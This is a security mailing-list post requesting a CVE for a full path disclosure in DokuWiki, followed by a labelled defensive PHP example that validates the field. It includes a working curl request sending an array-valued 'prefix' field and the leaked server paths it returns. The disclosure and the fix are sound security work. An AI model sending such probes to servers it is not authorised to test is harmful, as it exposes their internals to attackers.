oss-sec mailing list archives

CVE request: Full path disclosure in DokuWiki


From: Felipe Pena <felipensp () gmail com>
Date: Sun, 24 Jun 2012 09:40:13 -0300

Full path disclosure in DokuWiki
========================================
  DokuWiki is a simple to use Wiki aimed at the documentation needs of a small
company. It works on plain text files and thus needs no database. It has a
simple but powerful syntax which makes sure the datafiles remain readable
outside the Wiki.

  The POST input 'prefix' is not checked/cast for proper data type before
being passed to PHP's substr() function, which leads to a warning with
sensitive information being displayed on servers with PHP error level enabled:

  $PRE   = cleanText(substr($_POST['prefix'], 0, -1));

$ curl -dprefix[]=1 http://localhost/dokuwiki/doku.php 2> /dev/null | grep Warning
<b>Warning</b>:  substr() expects parameter 1 to be string, array given in <b>/var/www/dokuwiki/doku.php</b> on line <b>47</b><br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /var/www/dokuwiki/doku.php:47) in <b>/var/www/dokuwiki/inc/actions.php</b> on line <b>180</b><br />

Affected versions:
========================================
- Angua (RC1)
- Rincewind
- Anteater

References:
========================================
http://www.freelists.org/post/dokuwiki/Fwd-DokuWiki-Full-path-disclosure

Credits:
========================================
This vulnerability was discovered by Felipe Pena.
Twitter: @felipensp

-- 
Regards,
Felipe Pena
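
Added example (not part of the original post and not DokuWiki's own code): one way to keep an array-valued 'prefix' away from substr(), together with the PHP settings that keep warnings out of the response. post_string() is a hypothetical helper and the request bodies are constructed samples.

```php
<?php
// Added example; post_string() is a hypothetical helper, not a DokuWiki function.

// Defence in depth: keep warnings (and the paths they contain) out of
// HTTP responses and send them to the server log instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/**
 * Return a request field only if it is a plain string.
 * PHP parses "prefix[]=1" into an array, so any non-string value falls
 * back to $default instead of reaching string functions such as substr().
 */
function post_string(array $post, $key, $default = '')
{
    if (!isset($post[$key]) || !is_string($post[$key])) {
        return $default;
    }
    return $post[$key];
}

// Constructed request bodies: a normal form post, the array form from the
// report, and a request without the field.
$samples = array(
    'string field' => array('prefix' => 'some text.'),
    'array field'  => array('prefix' => array('1')),
    'missing'      => array(),
);

foreach ($samples as $label => $post) {
    // Same substr() call as the reported line, but fed a validated string.
    // The cast covers PHP versions where substr('', 0, -1) returns false.
    // In doku.php the result would then go through cleanText() as before.
    $pre = (string) substr(post_string($post, 'prefix'), 0, -1);
    printf("%-12s => %s\n", $label, var_export($pre, true));
}
```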

